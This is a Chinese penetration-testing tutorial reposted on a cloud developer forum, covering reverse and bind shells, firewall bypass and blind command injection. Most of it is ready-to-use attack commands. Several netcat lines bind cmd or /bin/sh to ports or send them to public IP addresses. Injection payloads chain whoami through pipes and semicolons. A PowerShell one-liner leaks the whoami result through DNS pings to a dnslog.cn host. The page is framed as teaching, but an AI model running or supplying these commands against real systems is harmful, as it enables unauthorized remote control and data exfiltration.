前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

作者头像
今天是几号
发布2024-07-18 15:13:16
1020
发布2024-07-18 15:13:16
举报
文章被收录于专栏:Cyber Security

常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。

1、正向连接:本地监听等待对方连接
Linux控制Windows

//绑定CMD到本地5566端口

nc -e cmd -lvvp 5566

//主动连接目标5566

nc 10.10.10.1 5566

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

//主动连接目标5566

nc 10.10.10.1 5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上

//等待5566连接

nc -lvvp 5566

//绑定CMD到目标5566端口

nc -e cmd 10.10.10.146 5566 windows 反弹linux

//等待5566连接

ncat -lvvp 5566

实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号 ) ||(逻辑或) &&(逻辑与) &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

例子:

ping -c 1 127.0.0.1 ; whoami ping -c 1 127.0.0.1 | whoami ping -c 1 127.0.0.1 || whoami ping -c 1 127.0.0.1 & whoami ping -c 1 127.0.0.1 && whoami ping -c 1 127.0.0.1 `whoami`

  1. 判断windows
  2. windows没有自带的nc
  3. 想办法上传nc 反弹权限
  4. 反弹

开启入站策略,采用反向连接

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

DNSLog Platform

出站入站都开启策略(数据不回显):OSI网络七层

ping 127.0.0.1 | powershell x=whoami;x=x.Replace('\','xxx');y='5t4zre.dnslog.cn';z=x+y;ping z

漏洞有,但是数据不回显(开启了防火墙):

1、反弹shell

2、带外查询

为什么要这样写?

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

结果带有“\” 导致ping无法执行

powershell x=whoami;x=x.Replace('\','xxx');y='.vpod5d.dnslog.cn';z=x+y;ping z

127.0.0.1 | powershell x=ver;x=x.Replace('\','xxx');y='.vpod5d.dnslog.cn';z=x+y;ping z

为什么开启防火墙后 whoami数据还是可以带外回显?

ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,

但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 常规基本渗透命令详解
    • 实用案例1:文件上传下载-解决无图形化&解决数据传输
      • 实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
        • 1、正向连接:本地监听等待对方连接
        • 2、反向连接:主动给出去,对方监听
    • 实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
    • 实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog
    • 为什么开启防火墙后 whoami数据还是可以带外回显?
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档